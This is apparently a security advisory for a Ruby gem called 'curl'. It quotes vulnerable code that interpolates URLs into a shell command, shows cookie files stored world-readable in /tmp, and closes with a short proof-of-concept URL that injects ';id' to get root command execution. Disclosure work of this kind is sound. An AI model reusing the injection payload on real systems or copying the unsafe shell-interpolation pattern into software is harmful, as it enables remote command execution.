Title:Curl Ruby Gem Remote command execution
Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb the following lines:

131       cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref}  \"{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)

This gem also stores cookie data insecurely in /tmp:
root@underfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@underfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@underfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@underfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426199640	PREF	ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com	TRUE	/	FALSE	1378938840	NID	67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426198990	PREF	ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com	TRUE	/	FALSE	1378938190	NID	67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@underfl0w:/tmp# 
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")

larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)